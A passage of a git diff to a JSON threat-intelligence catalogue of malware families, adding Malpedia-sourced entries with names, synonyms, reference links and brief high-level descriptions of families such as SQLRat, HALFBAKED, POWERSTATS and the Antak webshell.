"https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", + "https://attack.mitre.org/software/S0228/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", + "value": "NanHaiShu" + }, { "description": "", "meta": { @@ -2006,6 +2499,19 @@ "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, + { + "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", + "value": "SQLRat" + }, { "description": "", "meta": { @@ -2059,6 +2565,19 @@ "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", + "https://securelist.com/operation-applejeus/87553/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", + "value": "AppleJeus" + }, { "description": "", "meta": { @@ -2171,6 +2690,19 @@ "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer", + "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a8e71805-014d-4998-b21e-3125da800124", + "value": "DarthMiner" + }, { "description": "", "meta": { @@ -2198,6 +2730,19 @@ "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", + "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", + "value": "Eleanor" + }, { "description": "", "meta": { @@ -2212,6 +2757,19 @@ "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale", + "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c", + "value": "FailyTale" + }, { "description": "", "meta": { @@ -2482,6 +3040,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" @@ -2514,6 +3073,7 @@ "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ + "FileCoder", "Findzip" ], "type": [] @@ -2521,13 +3081,27 @@ "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, + { + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", + "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5", + "value": "PintSized" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], "type": [] @@ -2572,7 +3146,7 @@ "value": "Pwnet" }, { - "description": "", + "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", @@ -2602,6 +3176,19 @@ "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami", + "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", + "value": "Tsunami (OS X)" + }, { "description": "", "meta": { @@ -2616,6 +3203,22 @@ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", + "https://objective-see.com/blog/blog_0x3D.html", + "https://objective-see.com/blog/blog_0x3B.html", + "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7", + "value": "WindTail" + }, { "description": "", "meta": { @@ -2687,6 +3290,33 @@ "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", + "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", + "value": "Yort" + }, + { + "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", + "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", + "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", + "value": "ANTAK" + }, { "description": "", "meta": { @@ -2736,9 +3366,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", - "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + ], + "synonyms": [ + "Glimpse" ], - "synonyms": [], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", @@ -2757,6 +3391,20 @@ "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", + "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html", + "https://twitter.com/MJDutch/status/1074820959784321026?s=19" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3", + "value": "OilRig" + }, { "description": "", "meta": { @@ -2771,6 +3419,66 @@ "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", + "value": "POWERPIPE" + }, + { + "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", + "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0", + "value": "POWERSOURCE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c07f6484-0669-44b7-90e6-f642e316d277", + "value": "PowerSpritz" + }, + { + "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", + "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", + "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", + "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", + "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" + ], + "synonyms": [ + "Valyria" + ], + "type": [] + }, + "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", + "value": "POWERSTATS" + }, { "description": "", "meta": { @@ -2797,12 +3505,26 @@ "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, + { + "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox", + "https://twitter.com/kafeine/status/1092000556598677504" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8", + "value": "PresFox" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -2830,8 +3552,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", + "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], @@ -2899,6 +3623,19 @@ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", + "value": "pupy (Python)" + }, { "description": "", "meta": { @@ -2926,6 +3663,20 @@ "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (symbian)" }, + { + "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", + "https://attack.mitre.org/software/S0151/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "095c995c-c916-488e-944d-a3f4b9842926", + "value": "HALFBAKED" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { @@ -3033,7 +3784,7 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -3127,7 +3878,7 @@ "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -3144,9 +3895,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", + "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + ], + "synonyms": [ + "AliceATM", + "PrAlice" ], - "synonyms": [], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", @@ -3196,7 +3952,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] @@ -3301,6 +4058,21 @@ "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://twitter.com/ViriBack/status/1062405363457118210", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696", + "value": "Amadey" + }, { "description": "", "meta": { @@ -3317,6 +4089,20 @@ "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", + "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", + "value": "Anatova Ransomware" + }, { "description": "", "meta": { @@ -3325,17 +4111,18 @@ "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ @@ -3471,6 +4258,19 @@ "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22", + "value": "Artra Downloader" + }, { "description": "", "meta": { @@ -3626,7 +4426,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], "synonyms": [], "type": [] @@ -3673,6 +4474,21 @@ "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, + { + "description": "Information stealer which uses AutoIT for wrapping.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", + "https://blog.yoroi.company/research/the-ave_maria-malware/" + ], + "synonyms": [ + "AVE_MARIA" + ], + "type": [] + }, + "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", + "value": "Ave Maria" + }, { "description": "", "meta": { @@ -3708,8 +4524,10 @@ "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ @@ -3740,6 +4558,19 @@ "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat", + "https://twitter.com/KorbenD_Intel/status/1110654679980085262" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381", + "value": "BabyLon RAT" + }, { "description": "", "meta": { @@ -3753,6 +4584,19 @@ "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, + { + "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8", + "value": "BACKBEND" + }, { "description": "", "meta": { @@ -3811,11 +4655,12 @@ "value": "BadEncript" }, { - "description": "", + "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://blog.amossys.fr/badflick-is-not-so-bad.html" ], "synonyms": [], "type": [] @@ -3866,6 +4711,22 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir", + "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", + "https://www.youtube.com/watch?v=E2V4kB_gtcQ" + ], + "synonyms": [ + "Baldr" + ], + "type": [] + }, + "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", + "value": "Baldir" + }, { "description": "", "meta": { @@ -3976,6 +4837,19 @@ "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", + "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" + ], + "synonyms": [], + "type": [] + }, + "uuid": "404e8121-bced-4320-a984-2b490fad90f8", + "value": "Beapy" + }, { "description": "", "meta": { @@ -3989,7 +4863,7 @@ "value": "Bedep" }, { - "description": "", + "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", @@ -4001,12 +4875,38 @@ "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, + { + "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard", + "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7", + "value": "Belonard" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12", + "value": "Berbomthum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] @@ -4036,6 +4936,19 @@ "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, + { + "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download files\r\nExecute shell commands\r\nUninstall itself", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e", + "value": "Bezigate" + }, { "description": "", "meta": { @@ -4063,6 +4976,20 @@ "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", + "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", + 